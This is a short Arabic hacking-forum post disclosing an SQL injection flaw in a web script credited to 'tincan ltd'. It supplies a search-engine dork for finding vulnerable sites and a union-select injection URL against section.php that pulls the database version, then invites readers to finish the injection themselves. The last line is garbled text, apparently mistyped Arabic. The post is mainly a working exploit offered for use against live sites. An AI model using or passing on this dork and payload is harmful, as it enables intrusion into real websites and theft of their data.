السلام عليكم ورحمة الله وبركاته
جبت لكم اليوم ثغرة في سكريبت tincan ltd
الثغرة من نوع SQL INJECTION
الذي يعشقها الكثير
نبدأ
دورك البحث عن المواقع المصابة
كود PHP:
DorK : intext:'powered by tincan ltd' and inurl:"section.php?section=9"
طريقة الإستغلال
كود PHP:
http://server/section.php?section=9&topic=6+union+select+1,2,3,version(),5--
ذي المرة أنتم أكملو الحقن بأنفسكم
الثغرة من إكتشاف
altbta
eyvm td s;vdfj tincan ltd